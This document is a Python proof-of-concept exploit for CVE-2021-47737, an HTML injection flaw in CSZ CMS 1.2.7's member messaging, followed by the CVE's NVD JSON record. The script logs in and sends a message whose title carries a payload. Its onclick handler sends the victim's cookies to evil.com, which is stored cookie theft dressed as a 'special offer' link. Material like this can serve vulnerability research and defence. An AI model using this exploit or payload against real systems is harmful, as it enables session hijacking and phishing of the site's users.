CVE-2021-47737

import requests import re # CVE-2021-47737 PoC - CSZ CMS HTML Injection # Target: CSZ CMS 1.2.7 member messaging system TARGET_URL = "http://target.com/cszcms" LOGIN_URL = f"{TARGET_URL}/member/login" MESSAGE_URL = f"{TARGET_URL}/member/message/send" def login(session, username, password): """Authenticate to CSZ CMS""" login_data = { 'username': username, 'password': password } response = session.post(LOGIN_URL, data=login_data) return 'login' not in response.url.lower() def exploit_html_injection(session, victim_username): """ Inject malicious HTML into message title The injected content will be stored and displayed to other users """ # Malicious payload - phishing link disguised as legitimate malicious_title = '''<a href="http://evil.com/phishing?steal=" style="text-decoration:none;color:#000;background:url(https://legit-site.com/logo.png)" onclick="document.location='http://evil.com/steal?c='+document.cookie"> Click here for special offer!</a>''' message_data = { 'to_username': victim_username, 'subject': malicious_title, # HTML injection point 'message': 'Please check this important message.', 'submit': 'Send' } response = session.post(MESSAGE_URL, data=message_data) if response.status_code == 200: print("[+] Malicious message sent successfully!") print("[+] When victim views the message, HTML will be rendered") print("[+] This can be used for phishing or session hijacking") return True return False def main(): session = requests.Session() # Step 1: Login with low-privilege account if not login(session, 'attacker', 'password123'): print("[-] Login failed") return print("[+] Login successful") # Step 2: Exploit HTML injection via message title exploit_html_injection(session, 'victim') if __name__ == "__main__": main()

{"cve": {"id": "CVE-2021-47737", "sourceIdentifier": "[email protected]", "published": "2025-12-23T20:15:45.587", "lastModified": "2025-12-31T21:41:12.230", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CSZ CMS 1.2.7 contains an HTML injection vulnerability that allows authenticated users to insert malicious hyperlinks in message titles. Attackers can craft POST requests to the member messaging system with HTML-based links to potentially conduct phishing or social engineering attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cszcms:csz_cms:1.2.7:*:*:*:*:*:*:*", "matchCriteriaId": "531ECBF9-0ACF-4E19-BDB4-80D7D3965C0A"}]}]}], "references": [{"url": "https://sourceforge.net/projects/cszcms/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.cszcms.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/48357", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/csz-cms-html-injection-vulnerability-via-member-dashboard", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}